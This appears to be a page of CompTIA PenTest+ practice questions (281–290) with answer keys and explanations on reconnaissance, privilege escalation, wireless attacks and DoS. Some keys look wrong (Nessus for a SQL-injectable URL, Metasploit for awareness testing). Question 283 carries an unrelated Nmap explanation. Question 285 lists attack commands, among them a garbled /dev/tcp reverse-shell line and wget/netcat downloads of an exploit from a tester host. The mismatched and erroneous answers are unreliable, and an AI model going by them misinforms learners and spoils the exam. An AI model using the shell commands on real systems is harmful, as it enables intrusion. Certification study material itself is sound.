CompTIA CompTIA Certifications PT0-002 Questions & Answers

• Question 281:

  A company hired a penetration tester to do a social-engineering test against its employees. Although the tester did not find any employees' phone numbers on the company's website, the tester has learned the complete phone catalog was published there a few months ago.

  In which of the following places should the penetration tester look FIRST for the employees' numbers?

  A. Web archive

  B. GitHub

  C. File metadata

  D. Underground forums

  Correct Answer: A

• Question 282:

  A penetration tester runs the following command on a system:

  find / -user root -perm -4000 -print 2>/dev/null Which of the following is the tester trying to accomplish?

  A. Set the SGID on all files in the / directory

  B. Find the /root directory on the system

  C. Find files with the SUID bit set

  D. Find files that were created during exploitation and move them to /dev/null

  Correct Answer: C

  the 2>/dev/null is output redirection, it simply sends all the error messages to infinity and beyond preventing any error messages to appear in the terminal session.

  The tester is trying to find files with the SUID bit set on the system. The SUID (set user ID) bit is a special permission that allows a file to be executed with the privileges of the file owner, regardless of who runs it. This can be used to perform privileged operations or access restricted resources. A penetration tester can use the find command with the -user and -perm options to search for files owned by a specific user (such as root) and having a specific permission (such as 4000, which indicates the SUID bit is set).

• Question 283:

  A penetration tester is testing a company's public API and discovers that specific input allows the execution of arbitrary commands on the base operating system. Which of the following actions should the penetration tester take next?

  A. Include the findings in the final report.

  B. Notify the client immediately.

  C. Document which commands can be executed.

  D. Use this feature to further compromise the server.

  Correct Answer: B

  The Nmap command uses the Xmas scan technique, which sends packets with the FIN, PSH, and URG flags set. This is an attempt to bypass firewall rules and elicit a response from open ports. However, if the target responds with an RST packet, it means that the port is closed. Open ports will either ignore the Xmas scan packets or send back an ACK packet. Therefore, the information most likely indicates that all of the ports in the target range are closed. References: [Nmap Scan Types], [Nmap Port Scanning Techniques], [CompTIA PenTest+ Study Guide: Exam PT0-002, Chapter 4: Conducting Passive Reconnaissance, page 127]

• Question 284:

  Which of the following tools would be best suited to perform a cloud security assessment?

  A. OpenVAS

  B. Scout Suite

  C. Nmap

  D. ZAP

  E. Nessus

  Correct Answer: B

  The tool that would be best suited to perform a cloud security assessment is Scout Suite, which is an open-source multi-cloud security auditing tool that can evaluate the security posture of cloud environments, such as AWS, Azure, GCP, or Alibaba Cloud. Scout Suite can collect configuration data from cloud providers using APIs and assess them against security best practices or benchmarks, such as CIS Foundations. Scout Suite can generate reports that highlight security issues, risks, or gaps in the cloud environment, and provide recommendations for remediation or improvement. The other options are not tools that are specifically designed for cloud security assessment. OpenVAS is an open- source vulnerability scanner that can scan hosts and networks for vulnerabilities and generate reports with findings and recommendations. Nmap is an open-source network scanner and enumerator that can scan hosts and networks for ports, services, versions, OS, or other information1. ZAP is an open-source web application scanner and proxy that can scan web applications for vulnerabilities and perform attacks such as SQL injection or XSS. Nessus is a commercial vulnerability scanner that can scan hosts and networks for vulnerabilities and generate reports with findings and recommendations.

• Question 285:

  A penetration tester ran the following command on a staging server:

  python –m SimpleHTTPServer 9891

  Which of the following commands could be used to download a file named exploit to a target machine for execution?

  A. nc 10.10.51.50 9891 < exploit

  B. powershell –exec bypass –f \\10.10.51.50\9891

  C. bash –i >and /dev/tcp/10.10.51.50/9891 0and1>/exploit

  D. wget 10.10.51.50:9891/exploit

  Correct Answer: D

  Reference: https://www.redhat.com/sysadmin/simple-http-server

• Question 286:

  A penetration tester has been contracted to review wireless security. The tester has deployed a malicious wireless AP that mimics the configuration of the target enterprise WiFi. The penetration tester now wants to try to force nearby wireless stations to connect to the malicious AP. Which of the following steps should the tester take NEXT?

  A. Send deauthentication frames to the stations.

  B. Perform jamming on all 2.4GHz and 5GHz channels.

  C. Set the malicious AP to broadcast within dynamic frequency selection channels.

  D. Modify the malicious AP configuration to not use a pre-shared key.

  Correct Answer: A

  https://steemit.com/informatica/@jordiurbina1/tutorial-hacking-wi-fi-wireless- networks-with-wifislax

  The penetration tester should send deauthentication frames to the stations to force them to disconnect from their current access point and reconnect to another one, which may be the malicious AP deployed by the tester. Deauthentication frames are part of the 802.11 protocol and are used to terminate an existing wireless association between a station and an access point. However, they can also be spoofed by an attacker to disrupt or hijack wireless connections. The other options are not effective or relevant for this purpose. Performing jamming on all 2.4GHz and 5GHz channels would interfere with all wireless signals in the area, which may cause unwanted attention or legal issues. Setting the malicious AP to broadcast within dynamic frequency selection channels would not help, as these channels are used to avoid interference with radar systems and are not commonly used by wireless stations or access points. Modifying the malicious AP configuration to not use a pre-shared key would not help, as it would make it less likely for wireless stations to connect to it if they are configured to use encryption.

• Question 287:

  A penetration tester who is conducting a vulnerability assessment discovers that ICMP is disabled on a network segment. Which of the following could be used for a denial-of- service attack on the network segment?

  A. Smurf

  B. Ping flood

  C. Fraggle

  D. Ping of death

  Correct Answer: C

  Fraggle attack is same as a Smurf attack but rather than ICMP, UDP protocol is used. The prevention of these attacks is almost identical to Fraggle attack. Ref: https://www.okta.com/identity-101/fraggle-attack/

• Question 288:

  Which of the following should a penetration tester do NEXT after identifying that an application being tested has already been compromised with malware?

  A. Analyze the malware to see what it does.

  B. Collect the proper evidence and then remove the malware.

  C. Do a root-cause analysis to find out how the malware got in.

  D. Remove the malware immediately.

  E. Stop the assessment and inform the emergency contact.

  Correct Answer: E

  Stopping the assessment and informing the emergency contact is the best thing to do next after identifying that an application being tested has already been compromised with malware. This is because continuing the assessment might interfere with an ongoing investigation or compromise evidence collection. The emergency contact is the person designated by the client who should be notified in case of any critical issues or incidents during the penetration testing engagement.

  Reference: https://www.redteamsecure.com/blog/my-company-was-hacked-now-what

• Question 289:

  A penetration tester found the following valid URL while doing a manual assessment of a web application: http://www.example.com/product.php?id=123987.

  Which of the following automated tools would be best to use NEXT to try to identify a vulnerability in this URL?

  A. SQLmap

  B. Nessus

  C. Nikto

  D. DirBuster

  Correct Answer: B

• Question 290:

  A Chief Information Security Officer wants a penetration tester to evaluate the security awareness level of the company's employees.

  Which of the following tools can help the tester achieve this goal?

  A. Metasploit

  B. Hydra

  C. SET D. WPScan

  Correct Answer: A